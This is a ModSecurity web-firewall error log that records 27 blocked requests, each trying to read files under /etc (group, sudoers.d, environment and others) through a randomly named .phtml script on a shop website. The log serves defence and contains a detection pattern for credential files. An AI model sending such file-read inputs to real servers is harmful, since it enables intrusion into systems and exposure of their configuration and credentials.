[Fri Mar 20 06:16:25.433299 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.51:57250] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaV1pVZ5mVmJwsFMbvgAAAEY"]
[Fri Mar 20 06:16:25.858030 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.96:57258] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaV1pVZ5mVmJwsFMbvwAAAEs"]
[Fri Mar 20 06:16:26.323062 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.33:57268] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qal1pVZ5mVmJwsFMbwAAAAEE"]
[Fri Mar 20 06:16:26.492909 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.61:57272] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QahCii7xarUs8iHZT1gAAAg4"]
[Fri Mar 20 06:16:27.171537 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.122:57292] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qa11pVZ5mVmJwsFMbwQAAAEU"]
[Fri Mar 20 06:16:27.466926 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.74:57304] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qa9a6ubjKNq_cu4a-JQAAA0o"]
[Fri Mar 20 06:16:28.062393 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.107:57326] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbPqxLDW4GITHUkTRNwAAARA"]
[Fri Mar 20 06:16:28.234093 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.18:57332] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbPHIg5MgXLBnicPlgAAAAdg"]
[Fri Mar 20 06:16:28.447486 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.17:57334] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbAF0L0L-SsrnPo5TfQAAAsc"]
[Fri Mar 20 06:16:28.486477 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.121:57338] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbNa6ubjKNq_cu4a-JgAAA0g"]
[Fri Mar 20 06:16:29.240854 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.24:57360] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbRCii7xarUs8iHZT2AAAAgU"]
[Fri Mar 20 06:16:29.373173 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.68:57362] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbfqxLDW4GITHUkTROAAAARI"]
[Fri Mar 20 06:16:29.976105 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.93:57374] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbTJ3M9BSuKP7CAYDUwAAAI8"]
[Fri Mar 20 06:16:30.182828 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.113:57380] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbvqxLDW4GITHUkTROQAAAQk"]
[Fri Mar 20 06:16:30.436066 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.52:57388] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbhCii7xarUs8iHZT2QAAAgg"]
[Fri Mar 20 06:16:30.870755 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.73:57398] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbjJ3M9BSuKP7CAYDVAAAAI0"]
[Fri Mar 20 06:16:31.440021 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.21:57412] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QbxCii7xarUs8iHZT2gAAAg0"]
[Fri Mar 20 06:16:32.027452 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.19:57432] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcPqxLDW4GITHUkTROgAAARQ"]
[Fri Mar 20 06:16:32.087544 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.63:57438] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcPqxLDW4GITHUkTRPAAAAQs"]
[Fri Mar 20 06:16:32.362958 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.97:57396] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcF1pVZ5mVmJwsFMbxAAAAFU"]
[Fri Mar 20 06:16:32.715557 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.60:57454] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcLninkcc-iUj5ApKFQAAA5I"]
[Fri Mar 20 06:16:33.190704 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.37:57444] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcV1pVZ5mVmJwsFMbxgAAAFI"]
[Fri Mar 20 06:16:33.377274 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.86:57464] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcRCii7xarUs8iHZT3AAAAgk"]
[Fri Mar 20 06:16:33.951412 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.78:57482] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcfXLqtnMIWvjpaKGAQAAAos"]
[Fri Mar 20 06:16:34.157266 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.80:57462] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QchCii7xarUs8iHZT3QAAAgQ"]
[Fri Mar 20 06:16:34.514049 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.120:57496] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qcrninkcc-iUj5ApKFgAAA4U"]
[Fri Mar 20 06:16:34.835106 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.81:57504] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QcvXLqtnMIWvjpaKGAwAAApQ"]
[Fri Mar 20 06:16:36.258097 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.121:57510] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QczJ3M9BSuKP7CAYDVwAAAJA"]
